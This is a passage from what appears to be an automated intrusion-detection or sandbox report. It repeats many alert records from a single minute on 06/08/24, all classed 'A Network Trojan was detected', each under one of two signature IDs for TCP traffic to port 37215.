          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180528
          SID:2829579
          Source Port:44998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354830
          SID:2829579
          Source Port:48092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188678
          SID:2835222
          Source Port:40594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037311
          SID:2829579
          Source Port:37350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793426
          SID:2835222
          Source Port:35280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.156079
          SID:2835222
          Source Port:55426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.160552
          SID:2835222
          Source Port:37874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175574
          SID:2835222
          Source Port:53778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857620
          SID:2835222
          Source Port:58976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672595
          SID:2835222
          Source Port:34340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.831724
          SID:2835222
          Source Port:40798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466124
          SID:2829579
          Source Port:51570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180546
          SID:2829579
          Source Port:40702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742611
          SID:2835222
          Source Port:45660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542359
          SID:2835222
          Source Port:56562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113201
          SID:2829579
          Source Port:57220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.508488
          SID:2829579
          Source Port:44262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.812960
          SID:2829579
          Source Port:35030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353384
          SID:2829579
          Source Port:39972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403600
          SID:2835222
          Source Port:41398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044276
          SID:2829579
          Source Port:43808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040545
          SID:2835222
          Source Port:33978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449662
          SID:2835222
          Source Port:39388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912599
          SID:2829579
          Source Port:36116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.807596
          SID:2835222
          Source Port:35754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446206
          SID:2829579
          Source Port:44522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.134208
          SID:2835222
          Source Port:51732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552349
          SID:2829579
          Source Port:47982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.849850
          SID:2829579
          Source Port:33692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352434
          SID:2835222
          Source Port:54856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787792
          SID:2829579
          Source Port:43304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549485
          SID:2835222
          Source Port:56276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241488
          SID:2829579
          Source Port:57812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405930
          SID:2835222
          Source Port:54086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549631
          SID:2829579
          Source Port:33976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.598817
          SID:2835222
          Source Port:39358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734746
          SID:2829579
          Source Port:39598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795707
          SID:2835222
          Source Port:45516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.302919
          SID:2835222
          Source Port:34938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.168369
          SID:2835222
          Source Port:41332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.365372
          SID:2829579
          Source Port:34368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446838
          SID:2829579
          Source Port:32818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551077
          SID:2835222
          Source Port:35310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017722
          SID:2829579
          Source Port:58566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842250
          SID:2835222
          Source Port:57540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517100
          SID:2829579
          Source Port:56784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.134251
          SID:2829579
          Source Port:37010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356981
          SID:2835222
          Source Port:36002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884573
          SID:2829579
          Source Port:53734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887065
          SID:2829579
          Source Port:35418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887621
          SID:2835222
          Source Port:56176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242340
          SID:2835222
          Source Port:44766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741231
          SID:2829579
          Source Port:53018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159979
          SID:2835222
          Source Port:50094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782020
          SID:2835222
          Source Port:35040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.841717
          SID:2835222
          Source Port:42962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160910
          SID:2829579
          Source Port:50058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352121
          SID:2829579
          Source Port:40658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035618
          SID:2835222
          Source Port:45748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732638
          SID:2829579
          Source Port:45292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259917
          SID:2829579
          Source Port:57682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044224
          SID:2829579
          Source Port:46024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.496084
          SID:2835222
          Source Port:56046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730286
          SID:2829579
          Source Port:36546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.794245
          SID:2835222
          Source Port:34180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160533
          SID:2835222
          Source Port:53262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668158
          SID:2829579
          Source Port:39314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817200
          SID:2835222
          Source Port:58604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896391
          SID:2829579
          Source Port:35800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786420
          SID:2835222
          Source Port:35670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805082
          SID:2829579
          Source Port:34632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517468
          SID:2829579
          Source Port:57472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136065
          SID:2829579
          Source Port:33546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811858
          SID:2829579
          Source Port:37880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599846
          SID:2829579
          Source Port:55964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.516478
          SID:2835222
          Source Port:33100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238592
          SID:2835222
          Source Port:38926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512234
          SID:2835222
          Source Port:36970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731909
          SID:2829579
          Source Port:40398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107980
          SID:2829579
          Source Port:45678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108924
          SID:2829579
          Source Port:50180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272804
          SID:2829579
          Source Port:37968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177739
          SID:2829579
          Source Port:59904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.401917
          SID:2835222
          Source Port:59652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456507
          SID:2829579
          Source Port:51258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.159333
          SID:2835222
          Source Port:53286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.859506
          SID:2835222
          Source Port:57548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732217
          SID:2829579
          Source Port:40668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353733
          SID:2835222
          Source Port:39048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402575
          SID:2835222
          Source Port:56516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266021
          SID:2829579
          Source Port:56138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901961
          SID:2829579
          Source Port:42548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511686
          SID:2829579
          Source Port:42534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733704
          SID:2829579
          Source Port:43926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887418
          SID:2835222
          Source Port:46322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.447029
          SID:2835222
          Source Port:54310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463810
          SID:2829579
          Source Port:43564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.825009
          SID:2829579
          Source Port:54516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858999
          SID:2835222
          Source Port:47882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888166
          SID:2835222
          Source Port:53688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546631
          SID:2829579
          Source Port:58428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240613
          SID:2829579
          Source Port:59186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021684
          SID:2835222
          Source Port:35464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.026117
          SID:2829579
          Source Port:51204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264709
          SID:2835222
          Source Port:47050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495573
          SID:2835222
          Source Port:48428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461934
          SID:2835222
          Source Port:59368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793450
          SID:2829579
          Source Port:50692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911439
          SID:2829579
          Source Port:47714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353529
          SID:2829579
          Source Port:49562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780920
          SID:2829579
          Source Port:47298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236522
          SID:2829579
          Source Port:35824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731421
          SID:2835222
          Source Port:52272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817705
          SID:2829579
          Source Port:57216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604750
          SID:2835222
          Source Port:34166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732516
          SID:2829579
          Source Port:43468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.807541
          SID:2835222
          Source Port:36700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446197
          SID:2829579
          Source Port:56298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514435
          SID:2835222
          Source Port:52410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.824330
          SID:2835222
          Source Port:42768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166431
          SID:2835222
          Source Port:34036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352361
          SID:2829579
          Source Port:41656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465437
          SID:2829579
          Source Port:47044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791981
          SID:2829579
          Source Port:55112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153831
          SID:2835222
          Source Port:43652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038175
          SID:2835222
          Source Port:42542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.111599
          SID:2835222
          Source Port:51738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.812782
          SID:2835222
          Source Port:55828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261045
          SID:2829579
          Source Port:37708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.510408
          SID:2829579
          Source Port:60612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861815
          SID:2835222
          Source Port:43180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739873
          SID:2829579
          Source Port:41462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911626
          SID:2835222
          Source Port:48652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554162
          SID:2835222
          Source Port:36276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.243038
          SID:2835222
          Source Port:60314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.843889
          SID:2835222
          Source Port:52732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670047
          SID:2829579
          Source Port:35868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888181
          SID:2835222
          Source Port:40774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.517452
          SID:2829579
          Source Port:60066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663813
          SID:2835222
          Source Port:45624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020271
          SID:2835222
          Source Port:46516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.794106
          SID:2835222
          Source Port:51206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275667
          SID:2835222
          Source Port:44276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552085
          SID:2829579
          Source Port:49288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467662
          SID:2829579
          Source Port:56600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669652
          SID:2829579
          Source Port:38816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.818858
          SID:2835222
          Source Port:51660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014362
          SID:2829579
          Source Port:36718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126746
          SID:2835222
          Source Port:35236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128764
          SID:2835222
          Source Port:59588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887643
          SID:2829579
          Source Port:49926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740936
          SID:2829579
          Source Port:46752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.899275
          SID:2829579
          Source Port:55680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044805
          SID:2829579
          Source Port:34130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512418
          SID:2835222
          Source Port:53906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271655
          SID:2829579
          Source Port:37358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.152965
          SID:2835222
          Source Port:45364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107278
          SID:2835222
          Source Port:56796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.859602
          SID:2835222
          Source Port:36628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159046
          SID:2829579
          Source Port:55588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127395
          SID:2835222
          Source Port:57130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673747
          SID:2835222
          Source Port:52386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159629
          SID:2829579
          Source Port:56580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730187
          SID:2835222
          Source Port:49508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796587
          SID:2829579
          Source Port:56630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517789
          SID:2835222
          Source Port:53792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670527
          SID:2829579
          Source Port:43126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160318
          SID:2835222
          Source Port:34190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240358
          SID:2829579
          Source Port:38954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897709
          SID:2829579
          Source Port:45526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.856978
          SID:2829579
          Source Port:55078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354015
          SID:2829579
          Source Port:50138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446014
          SID:2829579
          Source Port:48788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552120
          SID:2829579
          Source Port:55710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462100
          SID:2835222
          Source Port:45894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129342
          SID:2835222
          Source Port:47596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731423
          SID:2835222
          Source Port:55538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892577
          SID:2835222
          Source Port:41478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262431
          SID:2829579
          Source Port:35048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800632
          SID:2835222
          Source Port:57162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044825
          SID:2829579
          Source Port:60706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.172834
          SID:2835222
          Source Port:42970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.899254
          SID:2829579
          Source Port:33098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016892
          SID:2835222
          Source Port:37174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264555
          SID:2835222
          Source Port:38498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602204
          SID:2835222
          Source Port:43728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174916
          SID:2829579
          Source Port:41218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.178418
          SID:2835222
          Source Port:32876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740799
          SID:2829579
          Source Port:51310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192266
          SID:2835222
          Source Port:40070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745039
          SID:2835222
          Source Port:52674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599623
          SID:2835222
          Source Port:40484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155885
          SID:2829579
          Source Port:52238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405295
          SID:2829579
          Source Port:37956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896268
          SID:2829579
          Source Port:35854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353410
          SID:2829579
          Source Port:48338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741830
          SID:2829579
          Source Port:50120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
